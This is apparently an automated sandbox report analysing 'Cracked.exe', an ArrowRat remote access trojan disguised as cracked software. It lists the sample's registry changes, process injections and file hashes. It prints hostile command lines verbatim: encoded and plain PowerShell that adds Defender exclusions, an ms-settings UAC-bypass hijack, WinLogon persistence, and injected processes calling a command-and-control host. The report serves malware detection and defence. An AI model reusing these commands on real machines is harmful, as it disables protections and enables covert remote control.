Malware Analysis Report

2024-10-10 10:15

Sample ID 230729-zfrh7afa48
Target Cracked.exe
SHA256 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb
Tags
arrowrat client persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb

Threat Level: Known bad

The file Cracked.exe was found to be: Known bad.

Malicious Activity Summary

arrowrat client persistence rat

Modifies WinLogon for persistence

ArrowRat

Modifies Installed Components in the registry

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-29 20:39

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-29 20:39

Reported

2023-07-29 20:42

Platform

win7-20230712-en

Max time kernel

141s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Cracked.exe"

Signatures

ArrowRat

rat arrowrat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" C:\Windows\Client.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Client.exe C:\Users\Admin\AppData\Local\Temp\Cracked.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell C:\Windows\Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell\open\command C:\Windows\Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings C:\Windows\Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell\open C:\Windows\Client.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" C:\Windows\Client.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute C:\Windows\Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Client.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2112 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\Client.exe
PID 2112 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\Client.exe
PID 2112 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Windows\Client.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2112 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\Cracked.exe C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
PID 2940 wrote to memory of 2824 N/A C:\Windows\Client.exe C:\Windows\explorer.exe
PID 2940 wrote to memory of 2824 N/A C:\Windows\Client.exe C:\Windows\explorer.exe
PID 2940 wrote to memory of 2824 N/A C:\Windows\Client.exe C:\Windows\explorer.exe
PID 2940 wrote to memory of 2152 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 2152 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 2152 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 2152 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1216 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1216 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1216 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1216 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 524 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 524 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 524 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 524 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 324 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 324 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 324 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 324 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 792 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 792 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 792 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 792 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 768 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 768 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 768 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 768 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1492 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1492 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1492 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1492 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 572 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 572 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 572 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 572 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1484 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1484 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1484 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1484 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1176 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1176 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1176 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2940 wrote to memory of 1176 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2824 wrote to memory of 2184 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 2184 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 2184 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 564 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 564 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2824 wrote to memory of 564 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 2940 wrote to memory of 2740 N/A C:\Windows\Client.exe C:\Windows\System32\ComputerDefaults.exe
PID 2940 wrote to memory of 2740 N/A C:\Windows\Client.exe C:\Windows\System32\ComputerDefaults.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Cracked.exe

"C:\Users\Admin\AppData\Local\Temp\Cracked.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZABjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgBqACMAPgA="

C:\Windows\Client.exe

"C:\Windows\Client.exe"

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

"C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\System32\ComputerDefaults.exe

"C:\Windows\System32\ComputerDefaults.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

Network

N/A

Files

memory/2112-55-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

memory/2112-54-0x0000000001000000-0x0000000001260000-memory.dmp

memory/2112-56-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

memory/2112-57-0x000000001B420000-0x000000001B4A0000-memory.dmp

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

memory/2940-63-0x0000000001010000-0x000000000103E000-memory.dmp

memory/2940-65-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

C:\Windows\Client.exe

MD5 d7dea9816b882cb53d615a3afdf0c955
SHA1 d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA256 96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512 b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

memory/2432-75-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2112-74-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

memory/2432-77-0x000000001B340000-0x000000001B622000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe

MD5 70f3bc193dfa56b78f3e6e4f800f701f
SHA1 1e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA256 3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA512 3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

\Users\Admin\AppData\Local\Temp\nsoB186.tmp\System.dll

MD5 a4dd044bcd94e9b3370ccf095b31f896
SHA1 17c78201323ab2095bc53184aa8267c9187d5173
SHA256 2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc
SHA512 87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

\Users\Admin\AppData\Local\Temp\nsoB186.tmp\nsDialogs.dll

MD5 0d45588070cf728359055f776af16ec4
SHA1 c4375ceb2883dee74632e81addbfa4e8b0c6d84a
SHA256 067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a
SHA512 751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

memory/2432-94-0x0000000002460000-0x0000000002468000-memory.dmp

memory/2432-95-0x000007FEF2690000-0x000007FEF302D000-memory.dmp

memory/2432-96-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2432-98-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2432-97-0x000007FEF2690000-0x000007FEF302D000-memory.dmp

memory/2432-99-0x0000000002910000-0x0000000002990000-memory.dmp

memory/2432-100-0x000007FEF2690000-0x000007FEF302D000-memory.dmp

memory/2740-102-0x0000000002250000-0x0000000002251000-memory.dmp

memory/2940-103-0x0000000000400000-0x0000000000480000-memory.dmp

memory/2824-104-0x0000000003BE0000-0x0000000003BE1000-memory.dmp

memory/2940-105-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp

memory/2740-106-0x0000000002250000-0x0000000002251000-memory.dmp

memory/2940-107-0x0000000000400000-0x0000000000480000-memory.dmp

memory/2824-108-0x0000000003BE0000-0x0000000003BE1000-memory.dmp

memory/2824-112-0x0000000002670000-0x0000000002680000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-29 20:39

Reported

2023-07-29 20:42

Platform

win10v2004-20230703-en

Max time kernel

144s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Cracked.exe"

Signatures

ArrowRat

rat arrowrat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" C:\Windows\Client.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Cracked.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation C:\Windows\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4924 set thread context of 3940 N/A C:\Windows\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Client.exe C:\Users\Admin\AppData\Local\Temp\Cracked.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
